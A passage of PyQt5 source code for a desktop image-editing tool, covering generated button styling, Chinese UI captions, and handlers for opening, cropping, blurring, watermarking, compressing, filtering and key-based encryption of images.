brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_decode.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_decode.setFont(font)
self.btn_decode.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_decode.setObjectName("btn_decode")
self.verticalLayout_2.addWidget(self.btn_decode)
self.btn_ocr = QtWidgets.QToolButton(self.frame_5)
self.btn_ocr.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_ocr.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_ocr.setFont(font)
self.btn_ocr.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_ocr.setObjectName("btn_ocr")
self.verticalLayout_2.addWidget(self.btn_ocr)
self.btn_screenshot = QtWidgets.QToolButton(self.frame_5)
self.btn_screenshot.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_screenshot.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_screenshot.setFont(font)
self.btn_screenshot.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_screenshot.setObjectName("btn_screenshot")
self.verticalLayout_2.addWidget(self.btn_screenshot)
self.btn_pick_color = QtWidgets.QToolButton(self.frame_5)
self.btn_pick_color.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_pick_color.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_pick_color.setFont(font)
self.btn_pick_color.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_pick_color.setObjectName("btn_pick_color")
self.verticalLayout_2.addWidget(self.btn_pick_color)
self.slider_blur = QtWidgets.QSlider(self.frame_4)
self.slider_blur.setEnabled(True)
self.slider_blur.setGeometry(QtCore.QRect(10, 130, 71, 22))
self.slider_blur.setOrientation(QtCore.Qt.Horizontal)
self.slider_blur.setObjectName("slider_blur")
self.slider_compress = QtWidgets.QSlider(self.frame_4)
self.slider_compress.setEnabled(True)
self.slider_compress.setGeometry(QtCore.QRect(10, 170, 71, 22))
self.slider_compress.setOrientation(QtCore.Qt.Horizontal)
self.slider_compress.setObjectName("slider_compress")
self.slider_lightness = QtWidgets.QSlider(self.frame_4)
self.slider_lightness.setEnabled(True)
self.slider_lightness.setGeometry(QtCore.QRect(11, 50, 71, 22))
self.slider_lightness.setOrientation(QtCore.Qt.Horizontal)
self.slider_lightness.setObjectName("slider_lightness")
self.horizontalLayout.addWidget(self.frame_4)
self.frame_3 = QtWidgets.QFrame(self.centralwidget)
self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.gridLayout = QtWidgets.QGridLayout(self.frame_3)
self.gridLayout.setObjectName("gridLayout")
self.img_panel = ImageLabel(self.frame_3)
self.img_panel.setObjectName("img_panel")
self.gridLayout.addWidget(self.img_panel, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.frame_3)
self.verticalLayout_3.addLayout(self.horizontalLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.action = QtWidgets.QAction(MainWindow)
self.action.setObjectName("action")
def retranslateUi(self, MainWindow):
    """Install all user-visible captions on the window and its buttons.

    Qt-style i18n hook: every caption is routed through
    ``QCoreApplication.translate`` so installed translators can
    substitute localized text at runtime.
    """
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "ImageUtil"))
    # Button captions, applied in declaration order.
    captions = (
        (self.btn_open, "打开"),
        (self.btn_save, "保存"),
        (self.btn_undo, "恢复"),
        (self.btn_confirm, "确定"),
        (self.btn_cancel, "取消"),
        (self.btn_clip, "裁剪"),
        (self.btn_lightness, "亮度"),
        (self.btn_watermark, "水印"),
        (self.btn_blur, "模糊"),
        (self.btn_compress, "压缩"),
        (self.btn_filter, "滤镜"),
        (self.btn_encode, "加密"),
        (self.btn_decode, "解密"),
        (self.btn_ocr, "OCR"),
        (self.btn_screenshot, "截图"),
        (self.btn_pick_color, "取色"),
    )
    for widget, caption in captions:
        widget.setText(_translate("MainWindow", caption))
    self.action.setText(_translate("MainWindow", "调整"))
@QtCore.pyqtSlot()
def on_btn_open_clicked(self):
    """
    Click handler for the "打开" (open) button.

    Asks the user for an image file, loads it with OpenCV, displays it,
    and resets the editing history (current / last / original snapshots).
    """
    img_name, img_type = QFileDialog.getOpenFileName(self, "打开图片", "", "*.jpg;;*.png;;*.jpeg")
    if (img_name == "") or (img_name is None):
        self.__show_warning_message_box("未选择图片")
        return
    img = cv2.imread(img_name)  # BGR ndarray, or None on failure
    if img is None:
        # cv2.imread does not raise on unreadable/corrupt files; without
        # this guard every later operation would crash on a None image.
        self.__show_warning_message_box("无法读取图片")
        return
    self.showImage(img)
    self.__current_img = img
    self.__last_img = self.__current_img
    # Deep copy so in-place edits never corrupt the "undo to original" snapshot.
    self.__original_img = copy.deepcopy(self.__current_img)
    self.__original_img_path = img_name
def showImage(self, img, is_grayscale=False):
    """Render an OpenCV image (numpy ndarray) into the central image panel.

    :param img: BGR image (H, W, 3) or a single-channel grayscale image (H, W)
    :param is_grayscale: unused here; grayscale input is detected from the
        array shape instead.  # NOTE(review): parameter looks vestigial — confirm
    """
    x = img.shape[1]  # image width in pixels
    y = img.shape[0]  # image height in pixels
    self.zoomscale = 1  # display zoom factor
    bytesPerLine = 3 * x  # row stride of a 3-channel image (valid after the conversion below)
    if len(img.shape) == 2:  # grayscale input: expand to 3 channels so Format_RGB888 applies
        img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
    # rgbSwapped() converts OpenCV's BGR channel order into the RGB that QImage expects.
    frame = QImage(img.data, x, y, bytesPerLine, QImage.Format_RGB888).rgbSwapped()
    pix = QPixmap.fromImage(frame)
    self.img_panel.setPixmap(pix)
    self.img_panel.repaint()
def __show_warning_message_box(self, msg):
    """Show a modal warning dialog titled "警告" with the given message."""
    QMessageBox.warning(self, "警告", msg, QMessageBox.Ok)
def __show_info_message_box(self, msg):
    """Show a modal information dialog titled "提示" with the given message."""
    QMessageBox.information(self, "提示", msg, QMessageBox.Ok)
@QtCore.pyqtSlot()
def on_btn_undo_clicked(self):
    """
    Click handler for the "恢复" (restore) button: revert the displayed
    image to its original, freshly-opened state.
    :return:
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    self.__current_img = self.__original_img
    # The restored image also becomes the rollback point for later operations.
    self.__last_img = self.__current_img
    self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_save_clicked(self):
    """
    Click handler for the "保存" (save) button: write the current image
    to a path chosen by the user.

    The save dialog is pre-filled with the original path and restricted
    to the original file's extension so OpenCV encodes the same format.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    # Extension of the originally opened file, including the dot.
    ext_name = self.__original_img_path[self.__original_img_path.rindex("."):]
    img_path, img_type = QFileDialog.getSaveFileName(self, "保存图片", self.__original_img_path, "*" + ext_name)
    if (img_path == "") or (img_path is None):
        # User cancelled the dialog; previously cv2.imwrite("") was attempted.
        return
    cv2.imwrite(img_path, self.__current_img)
@QtCore.pyqtSlot()
def on_btn_confirm_clicked(self):
    """
    Click handler for the "确定" (confirm) button: commit the pending
    operation (crop / lightness / blur) and record the result as the new
    baseline image.
    """
    self.control.hide()
    # Dispatch according to the operation the user started.
    if self.__current_operation == "clip":
        x_start, x_end = self.img_panel.img_x_start, self.img_panel.img_x_end
        y_start, y_end = self.img_panel.img_y_start, self.img_panel.img_y_end
        self.__current_img = crop_image(self.__current_img, x_start, x_end, y_start, y_end)
        self.showImage(self.__current_img)
        self.img_panel.clearRect()
        self.img_panel.flag = False  # disable rectangle drawing, i.e. forbid further crop selection
    elif self.__current_operation == "lightness":
        # Snap the brightness slider back to its neutral midpoint.
        self.slider_lightness.setValue(int((self.__lightness_max + self.__lightness_min) / 2))
    elif self.__current_operation == "blur":
        x_start, x_end = self.img_panel.img_x_start, self.img_panel.img_x_end
        y_start, y_end = self.img_panel.img_y_start, self.img_panel.img_y_end
        # Kernel-size options considered: (3, 3) (9, 9) (15, 15)
        self.__current_img = gaussian_blur(self.__current_img, x_start, x_end, y_start, y_end, (9, 9), 5)
        self.showImage(self.__current_img)
        self.img_panel.clearRect()
        self.img_panel.flag = False  # disable rectangle drawing
    # The committed result becomes the rollback point ("last") for the next operation.
    self.__last_img = self.__current_img
    self.__current_operation = None
@QtCore.pyqtSlot()
def on_btn_cancel_clicked(self):
    """
    Click handler for the "取消" (cancel) button: abort the pending
    operation and roll the preview back to the last committed image.
    """
    self.control.hide()
    operation = self.__current_operation
    if operation == "lightness":
        # Re-centre the brightness slider to its neutral midpoint.
        self.slider_lightness.setValue(int((self.__lightness_max + self.__lightness_min) / 2))
    elif operation in ("clip", "blur"):
        self.img_panel.clearRect()
        self.img_panel.flag = False  # disable rectangle drawing again
    self.__current_img = self.__last_img
    self.showImage(self.__current_img)
    self.__current_operation = None
@QtCore.pyqtSlot()
def on_btn_clip_clicked(self):
    """
    Click handler for the "裁剪" (crop) button: enter crop mode so the
    user can drag a rectangle over the image panel.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    self.__current_operation = "clip"
    self.img_panel.setCursor(Qt.CrossCursor)
    self.img_panel.flag = True  # rectangle drawing on -> a crop region can be selected
    self.control.show()
@QtCore.pyqtSlot()
def on_slider_lightness_sliderPressed(self):
    """
    Press handler for the "亮度" (lightness) slider (drag started): arm
    the "lightness" operation and reveal the confirm/cancel controls.
    """
    if self.__current_img is not None:
        self.__current_operation = "lightness"
        self.control.show()
    else:
        self.__show_warning_message_box("未选择图片")
@QtCore.pyqtSlot()
def on_slider_lightness_sliderReleased(self):
    """
    Release handler for the "亮度" (lightness) slider (drag stopped):
    apply the chosen brightness to the last committed image, show the
    result, and hide the slider.
    """
    if self.__current_img is None:
        return
    # Brightness is always applied relative to __last_img so repeated drags
    # do not compound.
    self.__current_img = adjust_lightness(self.__last_img, self.slider_lightness.value())
    self.showImage(self.__current_img)
    self.slider_lightness.hide()
@QtCore.pyqtSlot()
def on_btn_screenshot_clicked(self):
    """
    Take a screenshot.

    NOTE(review): not implemented — the body below is the author's
    sketched approach, left commented out.
    """
    # screen_img = QGuiApplication.primaryScreen().grabWindow(QApplication.desktop().winId())
    # screen_img_path = "{0}/ui/screenshot.png".format(os.getcwd())
    # label = ImageLabel()
    # label.showFullScreen()
    # label.setPixmap(screen_img)
    # screen_img.save(screen_img_path)
    # self.showImage(screen_img)
@QtCore.pyqtSlot()
def on_btn_pick_color_clicked(self):
    """
    Click handler for the "取色" (pick colour) button: open the colour
    picker dialog.

    exec_() blocks with its own event loop, so the dialog stays alive
    without keeping a reference on self.  (A plain show() on a local
    widget would let it be garbage-collected immediately; alternatively
    the dialog could be stored as an attribute, e.g.
    self.colorCatcher = ColorCatcher(); self.colorCatcher.show().)
    """
    picker = ColorCatcher()
    picker.exec_()
@QtCore.pyqtSlot()
def on_btn_watermark_clicked(self):
    """
    Click handler for the "水印" (watermark) button: prompt for watermark
    text and position, then stamp it on the last committed image.
    :return:
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    self.__current_operation = "watermark"
    dialog = WatermarkDialog()
    dialog.show()
    dialog.exec_()
    # Collect the user's choices once the modal dialog closes.
    position = dialog.get_watermark_position()
    watermark = dialog.get_watermark_text()
    # Red (BGR-style tuple) watermark applied to the last committed image.
    self.__current_img = add_watermark(self.__last_img, watermark, position, (255, 0, 0))
    self.showImage(self.__current_img)
    self.control.show()
@QtCore.pyqtSlot()
def on_btn_blur_clicked(self):
    """
    Click handler for the "模糊" (Gaussian blur) button: enter blur mode
    so the user can drag a rectangle over the region to blur.
    :return:
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    self.__current_operation = "blur"
    self.img_panel.setCursor(Qt.CrossCursor)
    self.img_panel.flag = True  # rectangle drawing on -> a blur region can be selected
    self.control.show()
@QtCore.pyqtSlot()
def on_btn_compress_clicked(self):
    """
    Click handler for the "压缩" (compress) button: resize the current
    image to user-supplied width/height.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    dialog = CompressDialog()
    dialog.show()
    dialog.exec_()
    # Width and height typed by the user (raw strings).
    w = dialog.input_width.text()
    h = dialog.input_height.text()
    # Reject missing input.
    if (w == "") or (w is None):
        self.__show_warning_message_box("未输入宽度")
        return
    if (h == "") or (h is None):
        self.__show_warning_message_box("未输入长度")
        return
    try:
        size = (int(w), int(h))
    except ValueError:
        # Non-numeric input previously crashed with an unhandled ValueError.
        self.__show_warning_message_box("宽度和长度必须为数字")
        return
    self.__current_img = compress_img(self.__current_img, size)
    self.showImage(self.__current_img)
    self.__show_info_message_box("压缩完成")
@QtCore.pyqtSlot()
def on_btn_img_stitching_clicked(self):
    """
    Stitch two fixed demo images together and display the result.

    NOTE(review): the input paths are hard-coded developer-machine
    absolute paths, so this handler only works on that machine —
    consider replacing them with a file dialog.
    """
    left_img_path = "D:/Code/03-python-code/Python/ImageUtil/com/zeketian/imageutil/hnu1.png"
    left_img = cv2.imread(left_img_path)  # first (left) image
    left_img_path2 = "D:/Code/03-python-code/Python/ImageUtil/com/zeketian/imageutil/hnu2.png"
    left_img2 = cv2.imread(left_img_path2)  # second image
    result_img = img_stitching([left_img, left_img2])
    self.showImage(result_img)
@QtCore.pyqtSlot()
def on_btn_filter_clicked(self):
    """
    Click handler for the "滤镜" (filter) button: let the user pick a
    filter in a modal dialog, then apply it to the last committed image.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    chooser = FilterDialog()
    chooser.show()
    chooser.exec_()
    # Apply the filter selected while the modal dialog was open.
    self.__current_img = add_filter(self.__last_img, chooser.filter_type)
    self.showImage(self.__current_img)
    self.control.show()
@QtCore.pyqtSlot()
def on_btn_encode_clicked(self):
    """
    Click handler for the "加密" (encrypt) button: encrypt the current
    image; the generated key is stored in a directory chosen by the user.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    key_dir = QFileDialog.getExistingDirectory(self, "请选择保存密钥的文件夹", os.getcwd())
    self.__current_img = img_encoding(self.__current_img, key_dir)
    self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_decode_clicked(self):
    """
    Click handler for the "解密" (decrypt) button: decrypt the current
    image using a .npy key file picked by the user.
    """
    if self.__current_img is None:
